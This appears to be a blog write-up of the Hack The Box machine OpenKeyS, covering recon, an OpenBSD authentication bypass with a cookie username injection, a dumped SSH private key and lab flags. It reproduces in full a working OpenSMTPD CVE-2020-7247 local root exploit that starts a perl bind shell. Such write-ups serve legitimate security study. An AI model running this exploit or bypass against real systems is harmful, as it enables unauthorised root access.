HackTheBox WriteUp OpenKeyS

Hack The Box Writeup: OpenKeyS

This box is the first OpenBSD machine I have done on Hack The Box. As the name already tells, it has something to do with OpenSSH keys. The foothold was very interesting, root a bit easy for a medium box. Nevertheless, a great box.

[0x1] Reconnaissance & Enumeration

First action of the day, a portscan! This box only has two open ports, which give me the feeling that the initial foothold will be over a website/webapplication.

nmap -sC -sV -p- -oA openkeys-allports 10.10.10.199

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-11 14:33 EST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.10.10.199
Host is up (0.053s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 5e:ff:81:e9:1f:9b:f8:9a:25:df:5d:82:1a:dd:7a:81 (RSA)
| 256 64:7a:5a:52:85:c5:6d:d5:4a:6b:a7:1a:9a:8a:b9:bb (ECDSA)
|_ 256 12:35:4b:6e:23:09:dc:ea:00:8c:72:20:c7:50:32:f3 (ED25519)
80/tcp open http OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).

Since port 80 is open and runs a webserver, I start gobuster in the background to search for specific files and folders. There are a few folders that could be enumerated by gobuster and the most interesting one is the includes folder.

gobuster dir -u http://openkeys -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,zip
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://openkeys
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,php,zip
[+] Timeout: 10s
===============================================================
2020/11/11 14:42:04 Starting gobuster
===============================================================
/index.php (Status: 200)
/images (Status: 301)
/css (Status: 301)
/includes (Status: 301)
/js (Status: 301)
/vendor (Status: 301)
/fonts (Status: 301)

A quick check to see what is running on port 80. Just a login page, with nothing more to see or notice in the code.

[0x2] Initial Foothold

During the gobuster scan, I noticed that there was an includes folder. Since I already tried various attacks on the login form, like SQLi, it decided to check out the folder. There are two files in there, one PHP file and a swap file.

I decided to download the file to further analyze them on my machine. The first lines shows something that looks like a username. After that, there is a lot of code, but at the bottom, there is a good hint towards the vulnerability.

b0VIM 8.1
jennifer
openkeys.htb
/var/www/htdocs/includes/auth.php
3210
#"!
    session_start();
    session_destroy();
    session_unset();
function close_session()
    $_SESSION["username"] = $_REQUEST['username'];
    $_SESSION["user_agent"] = $_SERVER['HTTP_USER_AGENT'];
    $_SESSION["remote_addr"] = $_SERVER['REMOTE_ADDR'];
    $_SESSION["last_activity"] = $_SERVER['REQUEST_TIME'];
    $_SESSION["login_time"] = $_SERVER['REQUEST_TIME'];
    $_SESSION["logged_in"] = True;
function init_session()
    }
        return False;
    {
    else
    }
        }
            return True;
            $_SESSION['last_activity'] = $time;
            // Session is active, update last activity time and return True
        {
        else
        }
            return False;
            close_session();
        {
            ($time - $_SESSION['last_activity']) > $session_timeout)
        if (isset($_SESSION['last_activity']) &&
        $time = $_SERVER['REQUEST_TIME'];
        // Has the session expired?
    {
    if(isset($_SESSION["logged_in"]))
    // Is the user logged in?
    session_start();
    // Start the session
    $session_timeout = 300;
    // Session timeout in seconds
function is_active_session()
    return $retcode;
    system($cmd, $retcode);
    $cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password);
function authenticate($username, $password)
<?php

The username appears to be something like jennifer@openkeys.htb. So that kind of hints to the fact that we need a password or something. The last lines include a hint to the check_out file. After some searching on the web, based on this file, I found an article about a vulnerability identified as CVE-2019-19521: Authentication bypass. It says that there is a way to bypass authentication by using a flaw in the way OpenBSD parses the username. Entering ‘-schannel’ as the username and a random password makes OpenBSD thinks you are providing the parameter ‘-option’ to tell the library to use the challenge protocol.

So, the first thing I did is to enter –schannel as the username and idontknow as the password. After submitting this set of credentials the website shows a successful login, but no key 🙁

So having this method to login is not all that is needed to crash this party. Since there is no other way to use the found username ‘jennifer’ in this login and keep the -schannel, I tried adding it to the request to pass along with the cookie.

As you can see the username is ‘-schannel’ and the password something random. At the end of the cookie, I added ‘username=jennifer’ and after that forward the request to the server.

HTB_OpenKeyS_Burprequest

Bingo! The website returns the private key for Jennifer. Knowing that the server also had OpenSSH running on 22/tcp, this might get me in the box.

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

I stored the private key in a file and used it to connect with the username ‘jennifer’ to the box. It worked instantly and now I have a full shell on the machine.

ssh jennifer@openkeys.htb -i sshkey_jennifer.txt
The authenticity of host 'openkeys.htb (10.10.10.199)' can't be established.
ECDSA key fingerprint is SHA256:gzhq4BokiWZ1NNWrblA8w3hLOhlhoRy+NFyi2smBZOA. 
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'openkeys.htb' (ECDSA) to the list of known hosts.
Last login: Wed Jun 24 09:31:16 2020 from 10.10.14.2
OpenBSD 6.6 (GENERIC) #353: Sat Oct 12 10:45:56 MDT 2019

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

openkeys$ whoami
jennifer

[0x3] Path to User flag

With the fresh shell for jennifer, I try to see if the user flag is part of this account. A quick ls shows the user.txt file.

openkeys$ ls -la
total 40
drwxr-xr-x 3 jennifer jennifer 512 Jun 23 13:58 .
drwxr-xr-x 3 root wheel 512 Jan 13 2020 ..
-rw-r--r-- 1 jennifer jennifer 87 Jan 13 2020 .Xdefaults
-rw-r--r-- 1 jennifer jennifer 771 Jan 13 2020 .cshrc
-rw-r--r-- 1 jennifer jennifer 101 Jan 13 2020 .cvsrc
-rw-r--r-- 1 jennifer jennifer 359 Jan 13 2020 .login
-rw-r--r-- 1 jennifer jennifer 175 Jan 13 2020 .mailrc
-rw-r--r-- 1 jennifer jennifer 215 Jan 13 2020 .profile
drwx------ 2 jennifer jennifer 512 Jan 13 2020 .ssh
-rw-r----- 1 jennifer jennifer 33 Jan 14 2020 user.txt

There is always a chance that we do not have permissions on the file, or that the content is encrypted. In this case the flag is readable and ready to submit.

openkeys$ cat user.txt
36ab21239a15c537bde90626891d2b10

[0x4] Path to Root flag -privilege escalation

The first thing I did, after grabbing the flag, is to look around a bit. I didn’t find any interesting files and linpeas also did not tell me anything interested. After a while, i search the internet for known privilege escalations in OpenBSD 6.6. I found an article about Local Exploits for OpenBSD 6.6, which included some interesting scripts for several CVE’s.

There was a vulnerability known as CVE-2020-7247 (OpenBSD OpenSMTPD 6.6 local root exploit) which grabbed my attention. It uses a flaw in the OpenSMTP daemon to execute commands as root via a crafted MAIL FROM address. It also includes the exploit code for this CVE, which I pasted to a bash script on the machine.

#!/bin/sh
# root66 - OpenBSD 6.6 OpenSMTPD 6.6 local root exploit for CVE-2020-7247
# starts a perl bindshell on port 1337 with root privileges
#
# Code mostly stolen from Qualys PoCs:
# - https://www.openwall.com/lists/oss-security/2020/01/28/3
# - https://blog.qualys.com/laws-of-vulnerabilities/2020/01/29/openbsd-opensmtpd-remote-code-execution-vulnerability-cve-2020-7247
# - https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt
# ---
# openbsd-6-6-x64$ ./root66
# OpenBSD 6.6 OpenSMTPD 6.6 local root exploit (CVE-2020-7247)
# [*] id: uid=1001(test) gid=1001(test) groups=1001(test)
# [*] checking system ...
# [*] directory /tmp/.payload is writable
# [*] 019_smtpd_exec patch has not been installed
# [*] writing payload to /tmp/.payload ...
# [*] executing /tmp/.payload ...
# <<< 220 openbsd-6-6-x64.localdomain ESMTP OpenSMTPD
# >>> EHLO localhost
# <<< 250-openbsd-6-6-x64.localdomain Hello localhost [local], pleased to meet you
# <<< 250-8BITMIME
# <<< 250-ENHANCEDSTATUSCODES
# <<< 250-SIZE 36700160
# <<< 250 HELP
# >>> MAIL FROM:<;/tmp/.payload;#@>  
# <<< 250 2.0.0 Ok
# >>> RCPT TO:<test@openbsd-6-6-x64.localdomain> 
# <<< 250 2.1.5 Destination address valid: Recipient ok
# >>> DATA
# <<< 354 Enter mail, end with "." on a line by itself
# >>> .
# <<< 250 2.0.0 9493d192 Message accepted for delivery
# >>> QUIT
# <<< 221 2.0.0 Bye
# [*] cleaning up /tmp/.payload ...
# [*] connecting to 127.0.0.1:1337 ...
# Connection to 127.0.0.1 1337 port [tcp/*] succeeded!
# id
# uid=0(root) gid=0(wheel) groups=0(wheel)
# uname -a
# OpenBSD openbsd-6-6-x64.localdomain 6.6 GENERIC#353 amd64
# ---
# 2020-01-31 - <bcoles@gmail.com>
# https://github.com/bcoles/local-exploits/tree/master/CVE-2020-7247

payload="/tmp/.payload"
/bin/echo "OpenBSD 6.6 OpenSMTPD 6.6 local root exploit (CVE-2020-7247)"

/bin/echo "[*] id: `id`"
/bin/echo "[*] checking system ..."

if [ -w `dirname $payload` ]; then
  /bin/echo "[*] directory $payload is writable"
else
  /bin/echo "[-] directory $payload is not writable"
  exit 1
fi
if syspatch -l | grep -q 019_smtpd_exec ; then
  /bin/echo "[-] 019_smtpd_exec patch has been installed"
  exit 1
else
  /bin/echo "[*] 019_smtpd_exec patch has not been installed"
fi

/bin/echo "[*] writing payload to $payload ..."
cat > $payload << "EOF"
#!/bin/sh
perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,1337,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};'
EOF
/bin/chmod +x $payload
/bin/echo "[*] executing $payload ..."
/bin/echo | /usr/sbin/sendmail -v -f "<;$payload;#@>" `whoami`
/bin/sleep 1
/bin/echo "[*] cleaning up $payload ..."
/bin/rm $payload
/bin/echo "[*] connecting to 127.0.0.1:1337 ..."
nc -v 127.0.0.1 1337

I saved the script as exploit.sh and gave it execute permission. After running the script, you see the payload is placed in the MAIL FROM ‘>>> MAIL FROM:<;/tmp/.payload;#@>’

openkeys$ chmod +x exploit.sh 
openkeys$ ./exploit.sh 
OpenBSD 6.6 OpenSMTPD 6.6 local root exploit (CVE-2020-7247)
[*] id: uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
[*] checking system ...
[*] directory /tmp/.payload is writable
[*] 019_smtpd_exec patch has not been installed
[*] writing payload to /tmp/.payload ...
[*] executing /tmp/.payload ...
<<< 220 openkeys.htb ESMTP OpenSMTPD
>>> EHLO localhost
<<< 250-openkeys.htb Hello localhost [local], pleased to meet you
<<< 250-8BITMIME
<<< 250-ENHANCEDSTATUSCODES
<<< 250-SIZE 36700160
<<< 250 HELP
>>> MAIL FROM:<;/tmp/.payload;#@> 
<<< 250 2.0.0 Ok
>>> RCPT TO:<jennifer@openkeys.htb> 
<<< 250 2.1.5 Destination address valid: Recipient ok
>>> DATA
<<< 354 Enter mail, end with "." on a line by itself
>>> .
<<< 250 2.0.0 4d2c6e41 Message accepted for delivery
>>> QUIT
<<< 221 2.0.0 Bye
[*] cleaning up /tmp/.payload ...
[*] connecting to 127.0.0.1:1337 ...
Connection to 127.0.0.1 1337 port [tcp/*] succeeded!

The last line shows the exploit ran successfully and the local reverse shell is connected. It does not show any other information, so to see if it really is successfully exploited I do a ‘whoami’. Guess what? I am root!

whoami
root
id
uid=0(root) gid=0(wheel) groups=0(wheel)

The last thing to do before I can officially call the boxed ‘rooted’ is to grab the flag and submit it. Another nice box done and dusted.

cat root.txt
f3a553b1697050ae885e7c02dbfc6efa


[box type=”warning” align=”” class=”” width=””]All information in this post is for educational use only! Do not use it at others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail![/box]

d0p4m1n3

Ethical Hacker | Cybersecurity enthusiast | Always looking to expand my knowledge | got root?

Add comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Your Header Sidebar area is currently empty. Hurry up and add some widgets.